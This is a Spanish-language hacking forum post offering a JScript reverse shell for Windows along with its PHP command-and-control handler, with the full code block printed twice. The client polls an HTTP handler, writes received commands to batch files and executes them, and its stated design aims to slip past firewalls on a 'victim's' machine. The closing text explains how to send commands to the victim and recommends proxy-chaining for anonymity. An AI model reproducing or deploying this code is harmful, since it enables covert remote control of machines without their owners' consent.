Autor
Código:
/*********************************************************
* JSCRIPT - REVERSE SHELL
* THIS LITTLE PROGRAM WILL CONNECT TO A HANDLER
* IN AN HTTP SERVER, THE COMMANDS TO EXECUTE IN
* THE VICTIM'S MACHINE WILL BE RECEIVED WITH XML
* -HTTP, SO THE FIREWALL SHOULDNT ALERT ANYTHING
* THE VARIABLES USED ARE:
* - SND-POST (p) = last command output
* - RECV-HEADER (comando) = command to execute
* (c) "Sirdarckcat-(Elhacker.Net)" (2005)
* This program is distributed under the GPL of GNU, with just
* this signature as invariant text, a copy of this licence can be
* found at http://www.gnu.org/.
* Any comments at:
* sirdarckcat [at] gma¡l [dot] com
*
*
* Use: just double click it
*
* This program is distributed "as is", with no warranty, and I am
* not responsable of any damage caused by primary or secundary
* efects of this program.
*
*-------------------------- HANDLER EXAMPLE -----------------------------*
<?php
// (c) Sirdarckcat-(elhacker.net) (2005)
//
// die("STOP!!"); //PARA DETENER EN CASO DE ERROR
function attack($q){
$default=urlencode("EXIT");
if($q){
$fz=filesize("commlog.txt");
$logg = fopen("commlog.txt","r");
$todo = fread($logg,$fz);
$todo = "\t".urlencode($q)."\n".$todo;
fclose($logg);
$logg = fopen("commlog.txt","w");
fwrite($logg,$todo);
fclose($logg);
echo "<a href=\"javascript:top.location.href=top.location.href;\">Fresca</a><!--";
readfile("commlog.txt");
echo "</xmp>
<script>
setTimeout('document.links[0].click();',1337);
</script>";
}elseif(isset($_GET['f'])){
echo "<a href=\"javascript:top.location.href=top.location.href;\">Fresca</a><!--";
readfile("commlog.txt");
echo "</xmp>
<script>
setTimeout('document.links[0].click();',1337);
</script>";
}else{
$logg = fopen("commlog.txt","r");
$todo = fread($logg,filesize("commlog.txt"));
$todo = "\t".urlencode($default)."\n".$todo."\n";
fclose($logg);
$logg = fopen("commlog.txt","w");
fwrite($logg,$todo);
fclose($logg);
?>
<html>
<center><iframe src="shell.php?a=1&f=1" name="pkdo" width="100%" height="85%"></iframe><hr>
<form method="POST" target="pkdo" action="shell.php?a=1">
<b>Comandos:</b> <textarea name="c"></textarea><br>
<input type="Submit" value="Entrar">
</form>
</center>
</html>
<?php
}
}
function victim(){
$default=urlencode("echo .ERASEME.");
$response=urldecode((isset($_POST['p']))?$_POST['p']:"Start!!");
$logg = fopen("commlog.txt","r");
$com = fscanf($logg, "\t%s\n");
$com = ($com[0])?$com[0]:$default;
header("Comando: $com");
fclose($logg);
$logg = fopen("commlog.txt","a");
if(strlen(trim($response))){
fwrite($logg,"\n<<".$response);
}
fclose($logg);
if($com!=$default){
$fz=filesize("commlog.txt");
$logg = fopen("commlog.txt","r");
$todo = fread($logg,$fz);
$todo = "\t".$default."\n".$todo."\n";
fclose($logg);
$logg = fopen("commlog.txt","w");
fwrite($logg,$todo);
fclose($logg);
}
print_r($_POST);
die("$com");
}
if (isset($_GET['a'])){
if(isset($_POST['c'])){
attack($_POST['c']);
}else{
attack(0);
}
}else{
if(isset($_POST['p'])){
victim();
}else{
victim();
}
}
?>
*********************************************************/
var xh = new ActiveXObject("msxml2.XMLHTTP"); // XmlHttp
var ws = new ActiveXObject("WScript.Shell"); // WScript.Shell
var fs = new ActiveXObject("Scripting.FileSystemObject"); // FSO
var path = "C:\\SYSTEM32\\"; // Dirección local para archivos temporales
var server = "127.0.0.1"; // Servidor
var port = "80"; // Puerto
var pag = "shell.php"; // Ruta al handler
function reverse_shell(sh){
if(fs.FileExists(path+"log.log")){ //Vemos si es la primera vez
// Leemos el contenido del archivo
sn = fs.OpenTextFile(path+"log.log", 1);
sx = sn.ReadAll();
sn.Close();
sn=sx.split(".ERASEME.").join("");
}else{
sh = "md "+path+"&echo Inicio>"+path+"log.log"; // Creamos la carpeta
sn = "Inicio" // Mandamos que es el principio
sw = fs.OpenTextFile(path+"r.bat", 2, 1); //Guardamos instrucciones en un batch
sw.Write(unescape("@echo on%0d%0a@cd \\%0d%0a"+path+"batch.bat>"+path+"log.log%0d%0aecho .ERASEME.>"+path+"log.log"));
sw.Close();
}
xh.open("POST","http://"+server+":"+port+"/"+pag,0);
xh.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xh.send("p="+escape(sn)); // mandamos el mensaje y recibimos el comando
if(!sh)
sh = unescape(xh.getResponseHeader("Comando")).split("+").join(" ");
//alert(sh+"::::::::"+xh.ResponseText); // PARA DEBUG
sw = fs.OpenTextFile(path+"batch.bat", 2, 1); //Guardamos instrucciones en un batch
sw.Write(sh);
sw.Close();
ws.Run(path+"r.bat"); // Ejecutamos
if(sh){
ws.Sleep(5000);
reverse_shell(); // Loop
}
}
reverse_shell();
* JSCRIPT - REVERSE SHELL
* THIS LITTLE PROGRAM WILL CONNECT TO A HANDLER
* IN AN HTTP SERVER, THE COMMANDS TO EXECUTE IN
* THE VICTIM'S MACHINE WILL BE RECEIVED WITH XML
* -HTTP, SO THE FIREWALL SHOULDNT ALERT ANYTHING
* THE VARIABLES USED ARE:
* - SND-POST (p) = last command output
* - RECV-HEADER (comando) = command to execute
* (c) "Sirdarckcat-(Elhacker.Net)" (2005)
* This program is distributed under the GPL of GNU, with just
* this signature as invariant text, a copy of this licence can be
* found at http://www.gnu.org/.
* Any comments at:
* sirdarckcat [at] gma¡l [dot] com
*
*
* Use: just double click it
*
* This program is distributed "as is", with no warranty, and I am
* not responsable of any damage caused by primary or secundary
* efects of this program.
*
*-------------------------- HANDLER EXAMPLE -----------------------------*
<?php
// (c) Sirdarckcat-(elhacker.net) (2005)
//
// die("STOP!!"); //PARA DETENER EN CASO DE ERROR
function attack($q){
$default=urlencode("EXIT");
if($q){
$fz=filesize("commlog.txt");
$logg = fopen("commlog.txt","r");
$todo = fread($logg,$fz);
$todo = "\t".urlencode($q)."\n".$todo;
fclose($logg);
$logg = fopen("commlog.txt","w");
fwrite($logg,$todo);
fclose($logg);
echo "<a href=\"javascript:top.location.href=top.location.href;\">Fresca</a><!--";
readfile("commlog.txt");
echo "</xmp>
<script>
setTimeout('document.links[0].click();',1337);
</script>";
}elseif(isset($_GET['f'])){
echo "<a href=\"javascript:top.location.href=top.location.href;\">Fresca</a><!--";
readfile("commlog.txt");
echo "</xmp>
<script>
setTimeout('document.links[0].click();',1337);
</script>";
}else{
$logg = fopen("commlog.txt","r");
$todo = fread($logg,filesize("commlog.txt"));
$todo = "\t".urlencode($default)."\n".$todo."\n";
fclose($logg);
$logg = fopen("commlog.txt","w");
fwrite($logg,$todo);
fclose($logg);
?>
<html>
<center><iframe src="shell.php?a=1&f=1" name="pkdo" width="100%" height="85%"></iframe><hr>
<form method="POST" target="pkdo" action="shell.php?a=1">
<b>Comandos:</b> <textarea name="c"></textarea><br>
<input type="Submit" value="Entrar">
</form>
</center>
</html>
<?php
}
}
function victim(){
$default=urlencode("echo .ERASEME.");
$response=urldecode((isset($_POST['p']))?$_POST['p']:"Start!!");
$logg = fopen("commlog.txt","r");
$com = fscanf($logg, "\t%s\n");
$com = ($com[0])?$com[0]:$default;
header("Comando: $com");
fclose($logg);
$logg = fopen("commlog.txt","a");
if(strlen(trim($response))){
fwrite($logg,"\n<<".$response);
}
fclose($logg);
if($com!=$default){
$fz=filesize("commlog.txt");
$logg = fopen("commlog.txt","r");
$todo = fread($logg,$fz);
$todo = "\t".$default."\n".$todo."\n";
fclose($logg);
$logg = fopen("commlog.txt","w");
fwrite($logg,$todo);
fclose($logg);
}
print_r($_POST);
die("$com");
}
if (isset($_GET['a'])){
if(isset($_POST['c'])){
attack($_POST['c']);
}else{
attack(0);
}
}else{
if(isset($_POST['p'])){
victim();
}else{
victim();
}
}
?>
*********************************************************/
var xh = new ActiveXObject("msxml2.XMLHTTP"); // XmlHttp
var ws = new ActiveXObject("WScript.Shell"); // WScript.Shell
var fs = new ActiveXObject("Scripting.FileSystemObject"); // FSO
var path = "C:\\SYSTEM32\\"; // Dirección local para archivos temporales
var server = "127.0.0.1"; // Servidor
var port = "80"; // Puerto
var pag = "shell.php"; // Ruta al handler
function reverse_shell(sh){
if(fs.FileExists(path+"log.log")){ //Vemos si es la primera vez
// Leemos el contenido del archivo
sn = fs.OpenTextFile(path+"log.log", 1);
sx = sn.ReadAll();
sn.Close();
sn=sx.split(".ERASEME.").join("");
}else{
sh = "md "+path+"&echo Inicio>"+path+"log.log"; // Creamos la carpeta
sn = "Inicio" // Mandamos que es el principio
sw = fs.OpenTextFile(path+"r.bat", 2, 1); //Guardamos instrucciones en un batch
sw.Write(unescape("@echo on%0d%0a@cd \\%0d%0a"+path+"batch.bat>"+path+"log.log%0d%0aecho .ERASEME.>"+path+"log.log"));
sw.Close();
}
xh.open("POST","http://"+server+":"+port+"/"+pag,0);
xh.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xh.send("p="+escape(sn)); // mandamos el mensaje y recibimos el comando
if(!sh)
sh = unescape(xh.getResponseHeader("Comando")).split("+").join(" ");
//alert(sh+"::::::::"+xh.ResponseText); // PARA DEBUG
sw = fs.OpenTextFile(path+"batch.bat", 2, 1); //Guardamos instrucciones en un batch
sw.Write(sh);
sw.Close();
ws.Run(path+"r.bat"); // Ejecutamos
if(sh){
ws.Sleep(5000);
reverse_shell(); // Loop
}
}
reverse_shell();
una vez configurado para conectarse al servidor, solo damos doble click, y al entrar a:
http://servidor.com/shell.php?a=a
podremos enviar comandos a la victima.
estaba trabajando en una version con ajax, para no tener que andar "refrescando" la pagina, pero.. ya me canse, son las 2 de la mañana aqui en Mexico..
Esta opcion les sirve para los que necesiten una shellcode, pero tengan un firewall muy molesto.. en servidores ASP, funciona a la perfección, ya que dan acceso a wscript.exe por defecto.
Saludos!!
/* Hay 2 errores facil identificables.. una instrucción no existe, y en otro me falta especificar una variable.. los que saben no tardaran en darse cuenta. */
En línea
asi te ahorras mucho.. ademas que es mas anónimo, porque puedes entrar al handler atravez de proxy-chaining.. y no te conectas directamente a la victima.
